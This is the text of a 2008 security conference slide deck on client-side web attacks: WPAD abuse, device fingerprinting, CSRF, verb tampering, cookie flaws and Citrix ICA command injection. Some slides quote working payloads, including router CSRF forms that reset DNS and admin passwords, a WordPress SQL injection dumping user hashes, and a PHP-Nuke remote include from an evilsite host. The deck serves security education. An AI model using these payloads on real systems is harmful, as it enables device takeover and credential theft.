Hacking Client Side Insecurities

33 %
67 %
Information about Hacking Client Side Insecurities
Technology

Published on January 1, 2009

Author: amiable_indian

Source: slideshare.net

Club-Hack 2008 Aditya K Sood Founder , Sec-Niche Security Hacking Client Side Insecurities

Hacking Client Side Insecurities Research Front: Founder , SECNICHE Security. Independent Security Researcher. Lead IS Author and Reviewer for Hakin9 Organization. Research Author for USENIX and ELSEVIER Journals. Like to do Bug Hunting. Released Advisories to Forefront Companies. Active Speaker at Security Conferences. [EU-Sec-West , XCON [07/08] , XKungFoo[08] , OWASP , Cert-IN etc] Team Lead – Evil Fingers Community. Projects – CERA, MLABS etc. Professional Front: Work as a Security Advisor / Penetration Tester for KPMG Consultancy. $whoami

Research Front:

Founder , SECNICHE Security.

Independent Security Researcher.

Lead IS Author and Reviewer for Hakin9 Organization.

Research Author for USENIX and ELSEVIER Journals.

Like to do Bug Hunting. Released Advisories to Forefront Companies.

Active Speaker at Security Conferences.

[EU-Sec-West , XCON [07/08] , XKungFoo[08] , OWASP , Cert-IN etc]

Team Lead – Evil Fingers Community.

Projects – CERA, MLABS etc.

Professional Front:

Work as a Security Advisor / Penetration Tester for KPMG Consultancy.

Hacking Client Side Insecurities Web 2.0 Application Model

Hacking Client Side Insecurities [1] Discovering Clients on Internet / Intranet.  Web Application Discovery Protocol  Fingerprinting Embedded Devices.  Rogue Request for HTTP Server Fingerprinting.  JavaScript Based Client Information Retrieval [2] Client Side Attack Patterns.  Pluggable Protocol Handlers.  JavaScript Jacking  JSON Injections [CSRF]  HTTP Verb Jacking  HTTP Verb Tampering.  Insecure Parametric Design of Cookies  Baking with XSS.  War XHR and IFRAME Exploiting Patterns.  Cross Site Request Forging (Embedded Devices)  The High Risk.  Surf Jacking  Jacking HTTPS in Traffic Pool. [3] Web Virtual Environment [RDP/ CITRIX]. [4] Questions and Answers. $ AGENDA

Hacking Client Side Insecurities User Interface with the Browsers to Access Content Remotely. Client System Stores Sensitive Information as Local Cache. Scripting – an Intermediate Model of Client Server Relation. No Executables Required , Just Manipulation through Scripts. Follows the Concept of Spoofing and Hidden Codes. Exploitable through JS-Jacking and VBS-Jacking with number of Attacks. Browsers – The Bulls Eye , Attacker Prime Target. The Concept – Exploitation On the Fly. Exploitation Trend Change towards Application. Application Level Attacks Easy to Trigger and Execute. Client Side ! Why?

User Interface with the Browsers to Access Content Remotely.

Client System Stores Sensitive Information as Local Cache.

Scripting – an Intermediate Model of Client Server Relation.

No Executables Required , Just Manipulation through Scripts.

Follows the Concept of Spoofing and Hidden Codes.

Exploitable through JS-Jacking and VBS-Jacking with number of Attacks.

Browsers – The Bulls Eye , Attacker Prime Target.

The Concept – Exploitation On the Fly.

Exploitation Trend Change towards Application.

Application Level Attacks Easy to Trigger and Execute.

Hacking Client Side Insecurities Discovery

Hacking Client Side Insecurities Discovering Clients leverage lot of Sensitive Information. Network and System Configuration is the Target Point to Attack. Internet , Search Engines Like Google Projects Plethora of Information. Attacking Intranet Requires the Inside Information of Party. Garbage Dumps on World Wide Web Servers , A Huge Bonus for Attackers. Client Side Supports various Protocols [Weak] for Robust Functionality. Insecure Administration of Servers – Configuration Mismanagement. Browser Based Insecurities. JavaScript Jacking on Client Browsers Reveal State Information of Clients. Every Single Element Discovered, Favors the Attack on Client. Fingerprinting ! Why?

Discovering Clients leverage lot of Sensitive Information.

Network and System Configuration is the Target Point to Attack.

Internet , Search Engines Like Google Projects Plethora of Information.

Attacking Intranet Requires the Inside Information of Party.

Garbage Dumps on World Wide Web Servers , A Huge Bonus for Attackers.

Client Side Supports various Protocols [Weak] for Robust Functionality.

Insecure Administration of Servers – Configuration Mismanagement.

Browser Based Insecurities.

JavaScript Jacking on Client Browsers Reveal State Information of Clients.

Every Single Element Discovered, Favors the Attack on Client.

Hacking Client Side Insecurities  Web Proxy Auto Discovery Protocol. Protocol used in Discovering Network Proxy Automatically. Configuration File Contains Intranet Addresses Inherently. Protocol Dismantle the Manual Configuration to Detect Proxy (PAC) File. WPAD Works on DHCP Behavior. [DHCPINFORM Query] No DNS Lookup is Required if DHCP Issues a Request. Protocol Handler  http:// wpad.xxxx.com PAC  Proxy Auto Configuration | Proxy Settings for Subnets. DHCP Query through  Uniform Resource Locator [URL] DNS Query through  wpad.dat , File Located in WPAD Root Directory Function  FindProxyForURL() Fingerprinting !

 Web Proxy Auto Discovery Protocol.

Protocol used in Discovering Network Proxy Automatically.

Configuration File Contains Intranet Addresses Inherently.

Protocol Dismantle the Manual Configuration to Detect Proxy (PAC) File.

WPAD Works on DHCP Behavior. [DHCPINFORM Query]

No DNS Lookup is Required if DHCP Issues a Request.

Protocol Handler  http:// wpad.xxxx.com

PAC  Proxy Auto Configuration | Proxy Settings for Subnets.

DHCP Query through  Uniform Resource Locator [URL]

DNS Query through  wpad.dat , File Located in WPAD Root Directory

Function  FindProxyForURL()

Hacking Client Side Insecurities  Web Proxy Auto Discovery Protocol. Attack Point  wpad.dat is Not Stored in a Secure Manner. Should be Placed in Default Virtual Directory. Browsers have Stringency in Making a Request to wpad.dat if Stored in Root Directory. No Referrer Check on the Request to wpad.dat File. wpad.dat  When a Request is issued it Redirects the page to Required Proxy File for Configuration of Browser.  Malicious Redirection Can be Done. When a DHCP Request is Issued no DNS Required. WOW ! No DNS Cache Poisoning is Required.  Rogue DHCP Server on LAN do the Trick. Wpad use JavaScript to Set Browsers for Proxy Settings. Fingerprinting !

 Web Proxy Auto Discovery Protocol.

Attack Point 

wpad.dat is Not Stored in a Secure Manner. Should be Placed in Default Virtual Directory.

Browsers have Stringency in Making a Request to wpad.dat if Stored in Root Directory.

No Referrer Check on the Request to wpad.dat File.

wpad.dat  When a Request is issued it Redirects the page to Required Proxy File for Configuration of Browser.

 Malicious Redirection Can be Done.

When a DHCP Request is Issued no DNS Required. WOW ! No DNS Cache Poisoning is Required.

 Rogue DHCP Server on LAN do the Trick.

Wpad use JavaScript to Set Browsers for Proxy Settings.

Hacking Client Side Insecurities Web Proxy Auto Discovery Protocol. # WPAD definition option wpad code 252 = text; # Suppress WPAD activity - no cache, no DNS. option wpad " 00"; # Configure a valid WPAD cache. The is required for Windows. # All config below this line is optional. #option wpad "http://www.example.com/wpad.pac "; class "MSFT" { match if substring(option vendor-class-identifier, 0, 4) = "MSFT"; # They put 252 on the DHCPINFORM's, but not on the DHCPREQUEST's # PRL. So we over-ride the PRL to include 252 = 0xFC, which will also # suppress the DHCPINFORMS! option dhcp-parameter-request-list = concat(option dhcp-parameter-request-list, fc); } function FindProxyForURL(url, host) { return "PROXY 192.168.0.1:3128 ; DIRECT"; } Fingerprinting !

Web Proxy Auto Discovery Protocol.

# WPAD definition option wpad code 252 = text; # Suppress WPAD activity - no cache, no DNS. option wpad " 00"; # Configure a valid WPAD cache. The is required for Windows. # All config below this line is optional. #option wpad "http://www.example.com/wpad.pac "; class "MSFT" { match if substring(option vendor-class-identifier, 0, 4) = "MSFT"; # They put 252 on the DHCPINFORM's, but not on the DHCPREQUEST's # PRL. So we over-ride the PRL to include 252 = 0xFC, which will also # suppress the DHCPINFORMS! option dhcp-parameter-request-list = concat(option dhcp-parameter-request-list, fc); }

function FindProxyForURL(url, host) { return "PROXY 192.168.0.1:3128 ; DIRECT"; }

Hacking Client Side Insecurities Embedded Devices Criticality in Determining the Internal Structure. HTTP Request Parameters are Manipulated. 301 Moved Permanently Response Code is thrown. Devices used to Spoof the Internal IP Addresses. Every Device has its Own Working Approach Used to Set Cookie in a Different Manner. Used to Change the parameter of HTTP Header Specifies. Analyzing the change in HTTP Headers Play the Trick. Necessary for Application Pen Testing at Infrastructural Level Fingerprinting !

Embedded Devices

Criticality in Determining the Internal Structure.

HTTP Request Parameters are Manipulated.

301 Moved Permanently Response Code is thrown.

Devices used to Spoof the Internal IP Addresses.

Every Device has its Own Working Approach

Used to Set Cookie in a Different Manner.

Used to Change the parameter of HTTP Header Specifies.

Analyzing the change in HTTP Headers Play the Trick.

Necessary for Application Pen Testing at Infrastructural Level

Hacking Client Side Insecurities Embedded Devices | HTTP Header Manipulation Case 1: Response Check 1 HTTP/1.1 200 OK Date: Tue, 05 Jul 2007 17:05:18 GMT Server: Server Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 nnCoection: close Transfer-Encoding: chunked Response Check 2 -  send: 'GET /?Action=DescribeImages&AWSAccessKeyId=0CZQCKRS3J69PZ6QQQR2&Owner.1 =084307701560&SignatureVersion=1&Timestamp=2007-02-15T17%3A30%3A13 &Version=2007-01- 03&Signature=<signature removed> HTTP/1.1 Host: ec2.amazonaws.com:443 Accept- Encoding: identity ' reply: 'HTTP/1.1 200 OK ' header: Server: Apache-Coyote/1.1 header: Transfer-Encoding: chunked header: Date: Thu, 15 Feb 2007 17:30:13 GMT  send: 'GET /?Action=ModifyImageAttribute&Attribute=launchPermission&AWSAccessKeyId =0CZQCKRS3J6 9PZ6QQQR2&ImageId=ami-00b95c69&OperationType=add&SignatureVersion=1& Timestamp=2007- 02-15T17%3A30%3A14&UserGroup.1=all&Version=2007-01-03&Signature=<signature removed> HTTP/1.1 Host: ec2.amazonaws.com:443 Accept-Encoding: identity ' reply: 'HTTP/1.1 400 Bad Request ' header: Server: Apache-Coyote/1.1 header: Transfer-Encoding: chunked header: Date: Thu, 15 Feb 2007 17:30:14 GMT header: nnCoection: close Fingerprinting ! Potentially a Net Scalar Device

Embedded Devices | HTTP Header Manipulation

Case 1:

Response Check 1

HTTP/1.1 200 OK

Date: Tue, 05 Jul 2007 17:05:18 GMT

Server: Server

Vary: Accept-Encoding,User-Agent

Content-Type: text/html;

charset=ISO-8859-1

nnCoection: close Transfer-Encoding: chunked

Response Check 2

-  send: 'GET /?Action=DescribeImages&AWSAccessKeyId=0CZQCKRS3J69PZ6QQQR2&Owner.1 =084307701560&SignatureVersion=1&Timestamp=2007-02-15T17%3A30%3A13 &Version=2007-01- 03&Signature=<signature removed> HTTP/1.1 Host: ec2.amazonaws.com:443 Accept- Encoding: identity ' reply: 'HTTP/1.1 200 OK ' header: Server: Apache-Coyote/1.1 header: Transfer-Encoding: chunked header: Date: Thu, 15 Feb 2007 17:30:13 GMT

 send: 'GET /?Action=ModifyImageAttribute&Attribute=launchPermission&AWSAccessKeyId =0CZQCKRS3J6 9PZ6QQQR2&ImageId=ami-00b95c69&OperationType=add&SignatureVersion=1& Timestamp=2007- 02-15T17%3A30%3A14&UserGroup.1=all&Version=2007-01-03&Signature=<signature removed> HTTP/1.1 Host: ec2.amazonaws.com:443 Accept-Encoding: identity ' reply: 'HTTP/1.1 400 Bad Request ' header: Server: Apache-Coyote/1.1 header: Transfer-Encoding: chunked header: Date: Thu, 15 Feb 2007 17:30:14 GMT header: nnCoection: close

Hacking Client Side Insecurities Embedded Devices | HTTP Header Manipulation Case 2: HTTP/1.1 200 OK Date: Tue, 10 July 2007 03:01:36 GMT Server: Apache Connection: close Content-type: text/plain HTTP/1.0 404 Not Found Xontent-Length: Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1 Last-Modified: Tue, 05 Jul 2007 17:01:12 GMT Accept-Ranges: bytes Cache-Control: no-cache, no-store Date: Tue, 05 Jun 2007 17:01:12 GMT Content-Length: 329 Connection: close Fingerprinting ! The Content Parameter is transformed into XONTENT. This is Generally Shown by Potential RADWARE Devices RADWARE Device

Embedded Devices | HTTP Header Manipulation

Case 2:

HTTP/1.1 200 OK

Date: Tue, 10 July 2007 03:01:36 GMT

Server: Apache

Connection: close

Content-type: text/plain

HTTP/1.0 404 Not Found

Xontent-Length:

Server: thttpd/2.25b 29dec2003

Content-Type: text/html; charset=iso-8859-1

Last-Modified: Tue, 05 Jul 2007 17:01:12 GMT

Accept-Ranges: bytes

Cache-Control: no-cache, no-store

Date: Tue, 05 Jun 2007 17:01:12 GMT

Content-Length: 329

Connection: close

Hacking Client Side Insecurities Embedded Devices | Big IP4 IP Based Session Management Response Check 1 Cookie: service-http=167880896.12345.0000. ASPSESSIONIDSSCATCAT = XXXXXXXXXXXXXXXXXXX Converting to Binary: Binary ( cookie ) == 00001010000000011010100011000000 Converting to blocks of 4  00001010 00000001 10101000 11000000 00001010  10 00000001  1 10101000  168 11000000  192 Fingerprinting ! Lets dissect the Pattern of this Number. Convert it into Decimal to see what is there. The Internal IP Dissected is  192.168.1.10 This Layout is specific to Working Devices

Embedded Devices | Big IP4 IP Based Session Management

Response Check 1

Cookie: service-http=167880896.12345.0000.

ASPSESSIONIDSSCATCAT = XXXXXXXXXXXXXXXXXXX

Converting to Binary:

Binary ( cookie ) == 00001010000000011010100011000000

Converting to blocks of 4 

00001010

00000001

10101000

11000000

00001010  10

00000001  1

10101000  168

11000000  192

Hacking Client Side Insecurities HTTP Servers  Fingerprinting with Rogue Requests Fingerprinting HTTP Servers with Rogue Requests. Web Servers React Stringently to Different Requests. The Response Code can be used to Analyze the Web Server. 80% of this Request-Response is Successful. Fingerprinting !

HTTP Servers  Fingerprinting with Rogue Requests

Fingerprinting HTTP Servers with Rogue Requests.

Web Servers React Stringently to Different Requests.

The Response Code can be used to Analyze the Web Server.

80% of this Request-Response is Successful.

Hacking Client Side Insecurities Client Side JavaScript Can Leverage Lot of Information of Browser State. Platform : Win32 OSCPU : undefined UserAgent : Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 Language : en-US AppName : Netscape AppVersion : 5.0 (Windows; en-US) Product : Gecko CodeName : 2008092417 Vendor : VendorSub : CodeName : Mozilla History : 3 ScreenW : 1440 ScrrenH : 900 Fingerprinting ! < script language=&quot;javascript&quot;> function browserInfo(form) { var txtInfo; txtInfo = &quot;Platform : &quot; + window.navigator.platform + &quot; &quot; + &quot;OSCPU : &quot; + window.navigator.oscpus + &quot; &quot; + &quot;UserAgent : &quot; + window.navigator.userAgent + &quot; &quot; + &quot;Language : &quot; + window.navigator.language + &quot; &quot; + &quot;AppName : &quot; + window.navigator.appName + &quot; &quot; + &quot;AppVersion : &quot; + window.navigator.appVersion + &quot; &quot; + &quot;Product : &quot; + window.navigator.product + &quot; &quot; + &quot;CodeName : &quot; + window.navigator.productSub + &quot; &quot; + &quot;Vendor : &quot; + window.navigator.vendor + &quot; &quot; + &quot;VendorSub : &quot; + window.navigator.vendorSub + &quot; &quot; + &quot;CodeName : &quot; + window.navigator.appCodeName + &quot; &quot; + &quot;History : &quot; + window.history.length + &quot; &quot; + &quot;ScreenW : &quot; + window.screen.width + &quot; &quot; + &quot;ScrrenH : &quot; + window.screen.height; form.txtOutput.value=txtInfo; return; } </script>

Client Side JavaScript Can Leverage Lot of Information of Browser State.

Platform : Win32

OSCPU : undefined

UserAgent : Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3

Language : en-US

AppName : Netscape

AppVersion : 5.0 (Windows; en-US)

Product : Gecko

CodeName : 2008092417

Vendor :

VendorSub :

CodeName : Mozilla

History : 3

ScreenW : 1440

ScrrenH : 900

Hacking Client Side Insecurities Demonstrations!

Hacking Client Side Insecurities Web Chemistry! Wow!

Hacking Client Side Insecurities Client Side Exploiting Patterns

Hacking Client Side Insecurities Client Side Exploiting Patterns Pluggable Protocol Handlers. JavaScript Jacking  JSON Injections [CSRF] HTTP Verb Jacking  HTTP Verb Tampering. Insecure Parametric Design of Cookies  Baking with XSS. War XHR and IFRAME Exploiting Patterns. Cross Site Request Forging through CSS Parameter. Cross Site Request Forging (Embedded Devices)  The High Risk. Surf Jacking  Jacking HTTPS in Traffic Pool.

Pluggable Protocol Handlers.

JavaScript Jacking  JSON Injections [CSRF]

HTTP Verb Jacking  HTTP Verb Tampering.

Insecure Parametric Design of Cookies  Baking with XSS.

War XHR and IFRAME Exploiting Patterns.

Cross Site Request Forging through CSS Parameter.

Cross Site Request Forging (Embedded Devices)  The High Risk.

Surf Jacking  Jacking HTTPS in Traffic Pool.

Hacking Client Side Insecurities Pluggable Protocol Handlers Attack works with XSS etc Vulnerabilities. Browsers support for the Application Handlers. Third Party Attack Base. GOOGLE CHROME Browser Support  protocol_handler&quot;: { &quot;excluded_schemes&quot;: { &quot;afp&quot;: true, &quot;data&quot;: true, &quot;disk&quot;: true, &quot;disks&quot;: true, &quot;file&quot;: true, &quot;hcp&quot;: true, &quot;javascript&quot;: true, &quot;mailto&quot;: false, &quot;ms-help&quot;: true, &quot;news&quot;: false, &quot;nntp&quot;: true, &quot;shell&quot;: true, &quot;snews&quot;: false, &quot;vbscript&quot;: true, &quot;view-source&quot;: true, &quot;vnd&quot;: { &quot;ms&quot;: { &quot;radio&quot;: true }

Attack works with XSS etc Vulnerabilities.

Browsers support for the Application Handlers.

Third Party Attack Base.

GOOGLE CHROME Browser Support 

protocol_handler&quot;: {

&quot;excluded_schemes&quot;: {

&quot;afp&quot;: true,

&quot;data&quot;: true,

&quot;disk&quot;: true,

&quot;disks&quot;: true,

&quot;file&quot;: true,

&quot;hcp&quot;: true,

&quot;javascript&quot;: true,

&quot;mailto&quot;: false,

&quot;ms-help&quot;: true,

&quot;news&quot;: false,

&quot;nntp&quot;: true,

&quot;shell&quot;: true,

&quot;snews&quot;: false,

&quot;vbscript&quot;: true,

&quot;view-source&quot;: true,

&quot;vnd&quot;: {

&quot;ms&quot;: {

&quot;radio&quot;: true

}

Hacking Client Side Insecurities Java Script Jacking JavaScript – The Most Critical and Most Usable Scripting Entity. Irrevocably Supported by Every Browsers. Active base for Malicious Web Base Content. Helps in Diversified Client Side Hacking from the Core. Dynamic Generated Object Malfunctioning. JS-Jacking  Leveraging System Specific Information. Attacker Can query Browser Related Information. Active Encoding Attacks Fused with JavaScript. DOM Based Calling Pattern for Web Based Attacks . Website Requires JavaScript Support. This anatomy works in both positive and negative manner

JavaScript – The Most Critical and Most Usable Scripting Entity.

Irrevocably Supported by Every Browsers.

Active base for Malicious Web Base Content.

Helps in Diversified Client Side Hacking from the Core.

Dynamic Generated Object Malfunctioning.

JS-Jacking  Leveraging System Specific Information.

Attacker Can query Browser Related Information.

Active Encoding Attacks Fused with JavaScript.

DOM Based Calling Pattern for Web Based Attacks .

Hacking Client Side Insecurities Java Script Jacking

Hacking Client Side Insecurities Java Script Jacking – JSON Injections JSON Injections  The Serialization Insecurity | Web 2.0 Direct Injections with Encoding. Everything is treated as String. Apply toJSONObject(). CSRF  A different way to Fuse attack with Notation Objects. { &quot;menu&quot;: { &quot;id&quot;: &quot;<img src=&quot;https://books.example.com/clickbuy?book=ISBNhere&quantity=100&quot;>&quot;, &quot;value&quot;: &quot;<img src=&quot;https://trading.example.com/xfer?from=MSFT&to=RHAT&confirm=Y&quot;>&quot;, &quot;popup&quot;: &quot;<scriptsrc=&quot;https://www.google.com/accounts/UpdateEmail?service=adsense &Email=mymail@newmail.net&Passwd=cool&save=&quot;></script>&quot; } } } Cross Site Request Forgery Structured in JSON – Google Ad sense Layout.

Hacking Client Side Insecurities HTTP Verb Jacking HTTP  Stateless Protocol. Every Request is Independent of other. HTTP supports number of Request. HTTP Verb Jacking  Play with HTTP Requests like GET/POST. Attack Affect  Applications handling XML Data. Versatile Attack. Request Schema is Defined in web.xml file. HTTP Request Functionality is Placed in web.xml File. Verb Jacking == Verb Tampering. Exists for a Long Period of Time. HTTP 1.0 and HTTP 1.1 Plays a Part. Major Flaw  HTTP End Point Check does not Disseminate among HTTP Request. Only Parameter Check is Performed. All Verbs are Allowed. In 2006 , I have released a paper called Rogue XML Specifications which list the potential insecurities in web.xml file. http://packetstormsecurity.org/papers/general/RogueXMLSpecific.pdf

HTTP  Stateless Protocol. Every Request is Independent of other.

HTTP supports number of Request.

HTTP Verb Jacking  Play with HTTP Requests like GET/POST.

Attack Affect  Applications handling XML Data. Versatile Attack.

Request Schema is Defined in web.xml file.

HTTP Request Functionality is Placed in web.xml File.

Verb Jacking == Verb Tampering.

Exists for a Long Period of Time.

HTTP 1.0 and HTTP 1.1 Plays a Part.

Hacking Client Side Insecurities HTTP Verb Jacking security-constraint> <web-resource-collection> <web-resource-name>drivers</web-resource-name> <description> Security constraint for drivers page </description> <url-pattern>/drivers.html</url-pattern> <http-method>POST</http-method> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <description> constraint for drivers </description> <role-name>manager</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> </login-config> <security-role> <role-name>manager</role-name> The snapshot of web.xml file for a certain target. The security constraint parameter defines the allowed request. The type of Authentication allowed. HTTP Verb Jacking  Manager directories will not be Accessed by GET/POST Request. What about HEAD Request. J2EE ,JSP , ASP , ASP.NET,PHP etc are based on configuration files to process the type of request to handle. [ GET/POST/HEAD etc]

Hacking Client Side Insecurities Insecure Parametric Cookies Insecure Use of Cookies in Session Management. Where the Security State is ? Majority Fails to Instantiate. XSS Drags in the Application. Authenticated Cookies can be Undertaken. The Real Cause  Insecure Design of Cookies with Parameters. Cookie Security Parameter Check Cookie Security Design is Judged by two major factors: Cookie over Secure Channel [HTTPS ] Cookie Extraction through JavaScript Calls. Cookie Security Parameters are :- Secure ( boolean)  Allowed over only HTTPS. HttpOnly ( boolean )  JavaScript document.cookie Fails.

Insecure Use of Cookies in Session Management.

Where the Security State is ? Majority Fails to Instantiate.

XSS Drags in the Application. Authenticated Cookies can be Undertaken.

The Real Cause  Insecure Design of Cookies with Parameters.

Cookie Security Design is Judged by two major factors:

Cookie over Secure Channel [HTTPS ]

Cookie Extraction through JavaScript Calls.

Hacking Client Side Insecurities XHR and IFRAME XHR  XML HTTP DOM based API for XML Data Transference. Active Mechanism based on AJAX. XHR Request does not Cached in the History of Browser. IFRAME Requests have a proper History Caching Layout. XHR Requests are Irreversible. IRAME is totally Reverse. Working Functionality of both are Different from Each other. Number of Client Side Attacks are Exploited by using these Elements. If your browser do not support Ajax XHR request and a page is loaded into browser then the most of the remote toolkits have a hidden iframe to provide fake XHR support to the page.

XHR  XML HTTP DOM based API for XML Data Transference.

Active Mechanism based on AJAX.

XHR Request does not Cached in the History of Browser.

IFRAME Requests have a proper History Caching Layout.

XHR Requests are Irreversible. IRAME is totally Reverse.

Working Functionality of both are Different from Each other.

Number of Client Side Attacks are Exploited by using these Elements.

Hacking Client Side Insecurities XHR and IFRAME < script > var oRequest = new XMLHttpRequest(); var sURL = &quot;http://www.snapdrive.net/files/571814/chrome.txt&quot;; alert('Downloading a txt file..please wait.'); oRequest.open(&quot;GET&quot;,sURL,false); oRequest.setRequestHeader(&quot;User-Agent&quot;,navigator.userAgent); oRequest.send(null); xmlDoc=oRequest.ResponseText; alert(xmlDoc); if (oRequest.status==200) { alert('Done...now try editing the Text-Box!'); var str=&quot; Winget 3.0 DoS Exploit PoC.Minimize Winget & Right-Click & Copy to clipboard.&quot;; document.write(str.link(&quot;http://&quot;+oRequest.responseText+&quot;.exe&quot;)); } else {alert('Error executing XMLHttpRequest call!');} Local Dos [Milw0rm] var iframe = document.createElement(&quot;IFRAME&quot;); iframe.setAttribute(&quot;src&quot;, 'ftp://localhost/anything'); iframe.setAttribute(&quot;name&quot;, 'myiframe'); iframe.setAttribute(&quot;id&quot;, 'myiframe'); iframe.setAttribute(&quot;onload&quot;, 'read_iframe(&quot;myiframe&quot;)'); iframe.style.width = &quot;100px&quot;; iframe.style.height = &quot;100px&quot;; document.body.appendChild(iframe); Konqueror 3.5.5 Crash [Milw0rm] [Word Press SQL Injection through IFRAME] wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- [PHP Nuke IFRAME] http://www.example.com/nuke_path/iframe.php?file=ftp://user:pass@evilsite.com/public_html/shell.html (or) .htm http://www.milw0rm.com/exploits/6777 http://www.milw0rm.com/exploits/3512

Hacking Client Side Insecurities Embedded Devices - CSRF [1] Cisco Router Remote Administration Execution CSRF Exploit [Milw0rm] < html> <body> <body onload=&quot;fdsa.submit();&quot;> <form name=fdsa method=&quot;post&quot; action=&quot;http://10.10.10.1/level/15/exec/-/configure/http&quot;> <input type=hidden name=command value=&quot;alias exec xx xx&quot;> <input type=hidden name=command_url value=&quot;/level/15/exec/-&quot;> <input type=hidden name=new_command_url value=&quot;/level/15/configure/-&quot;> </body> </html> [3] EXPLAY CMS CSRF Exploit <img src=&quot;http://explay.localhost/admin.php?name =users&page=1&order=user_id&set_admin=2&quot; /> [2] A-Link WL54AP3 and WL54AP2 CSRF [Milw0rm] <html> <body onload=&quot;document.wan.submit(); document.password.submit()&quot;> <form action=&quot;http://192.168.1.254/goform/formWanTcpipSetup&quot; method=&quot;post&quot; name=&quot;wan&quot;> <input type=&quot;hidden&quot; value=&quot;dnsManual&quot; name=&quot;dnsMode&quot; checked> <input type=&quot;hidden&quot; name=&quot;dns1&quot; value=&quot;216.239.32.10&quot;> <input type=&quot;hidden&quot; name=&quot;dns2&quot; value=&quot;216.239.32.10&quot;> <input type=&quot;hidden&quot; name=&quot;dns3&quot; value=&quot;216.239.32.10&quot;> <input type=&quot;hidden&quot; name=&quot;webWanAccess&quot; value=&quot;ON&quot; checked=&quot;checked&quot;> </form> <form action=&quot;http://192.168.1.254/goform/formPasswordSetup&quot; method=&quot;post&quot; name=&quot;password&quot;> <input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;mallory&quot;> <input type=&quot;hidden&quot; name=&quot;newpass&quot; value=&quot;gotroot&quot;> <input type=&quot;hidden&quot; name=&quot;confpass&quot; value=&quot;gotroot&quot;> </form> </body> </html>

Hacking Client Side Insecurities SURF Jacking – HTTPS at Stake Vulnerable Play with HTTPS Websites. Surf Jacking [HTTPS] is an Outcome from Side Jacking [HTTP]. Basic Flaw is In Cookie Setting by Respective Servers. All Insecure Cookie Based Website at Risk. Side Jacking discovered by Errata Security. Surf Jacking discovered by Enable Security But Cookie Insecurity is known back time. Greets to break down into Attacks.

Vulnerable Play with HTTPS Websites.

Surf Jacking [HTTPS] is an Outcome from Side Jacking [HTTP].

Basic Flaw is In Cookie Setting by Respective Servers.

All Insecure Cookie Based Website at Risk.

Hacking Client Side Insecurities Demonstrations!

Hacking Client Side Insecurities RDP / ICA – Command Execution Virtual Environment for Clients to Produce Interface with Servers. Executing Commands and GUI Operations Generically. ICA  Independent Computing Architecture , CITRIX Applications RDP  Remote Desktop Protocol , Microsoft Proprietary Protocol. Basically , Virtual Desktop Working Functionality. Protocols Defined have Different Working Behavior for ICA and RDP Application ( RDP )  MTS i.e. Microsoft Terminal Services. Clients Exist for almost all Platforms [*Nix, Windows etc]. ICA  Similar to X Window System / XEN Virtual Environment. RDP Client  RDC + TSC RDC  Remote Desktop Connection. TSC  Terminal Services Connection.

Virtual Environment for Clients to Produce Interface with Servers.

Executing Commands and GUI Operations Generically.

ICA  Independent Computing Architecture , CITRIX Applications

RDP  Remote Desktop Protocol , Microsoft Proprietary Protocol.

Basically , Virtual Desktop Working Functionality.

Protocols Defined have Different Working Behavior for ICA and RDP

Application ( RDP )  MTS i.e. Microsoft Terminal Services.

Clients Exist for almost all Platforms [*Nix, Windows etc].

ICA  Similar to X Window System / XEN Virtual Environment.

RDP Client  RDC + TSC

RDC  Remote Desktop Connection.

TSC  Terminal Services Connection.

Hacking Client Side Insecurities RDP / ICA Citrix Web ICA File: Webica.ini Trusted and Un-trusted Distinction  Client Modeling Check. It depicts the trusted behavior of ICA Client from its Origin Point using the webica.ini file. Trusted ( ICA Client )  Program Neighborhood / PN Agent. Un-Trusted ( ICA Client )  Web Interface / Direct ICA File Execution.  Structured Dependency over webica.ini file. It is used to set Access Rights. Citrix Application Server File: Appsrv.ini Custom ICA Connections are defined in it. Information about Entries in Remote Connection Manager.

Citrix Web ICA File: Webica.ini

Trusted and Un-trusted Distinction  Client Modeling Check.

It depicts the trusted behavior of ICA Client from its Origin Point using the webica.ini file.

Trusted ( ICA Client )  Program Neighborhood / PN Agent.

Un-Trusted ( ICA Client )  Web Interface / Direct ICA File Execution.

 Structured Dependency over webica.ini file. It is used to set Access Rights.

Citrix Application Server File: Appsrv.ini

Custom ICA Connections are defined in it.

Information about Entries in Remote Connection Manager.

Hacking Client Side Insecurities Attack Point - ICA Citrix Desktop Connection parameters provide a functionality to feed a specific Command which will get executed when a connection is initiated to the server by the client. Usually instead of the desktop the command gets executed. [ApplicationServers] Desktop= [Desktop] TransportDriver=TCP/IP BrowserProtocol=UDP DesiredHRES=4294967295 DesiredVRES=4294967295 ScreenPercent=0 DoNotUseDefaultCSL=Off Description=Desktop Address=citrix.msdsb.net InitialProgram=#ROGUE or MALICIOUS COMMAND IconPath=M:Program FilesCitrixICA Clientpn.exe IconIndex=1 ConnectType=1 MaximumCompression=Off UseAlternateAddress=0 Compress=On .

Citrix Desktop Connection parameters provide a functionality to feed a specific

Command which will get executed when a connection is initiated to the server

by the client. Usually instead of the desktop the command gets executed.

[ApplicationServers]

Desktop=

[Desktop]

TransportDriver=TCP/IP

BrowserProtocol=UDP

DesiredHRES=4294967295

DesiredVRES=4294967295

ScreenPercent=0

DoNotUseDefaultCSL=Off

Description=Desktop

Address=citrix.msdsb.net

InitialProgram=#ROGUE or MALICIOUS COMMAND

IconPath=M:Program FilesCitrixICA Clientpn.exe

IconIndex=1

ConnectType=1

MaximumCompression=Off

UseAlternateAddress=0

Compress=On

.

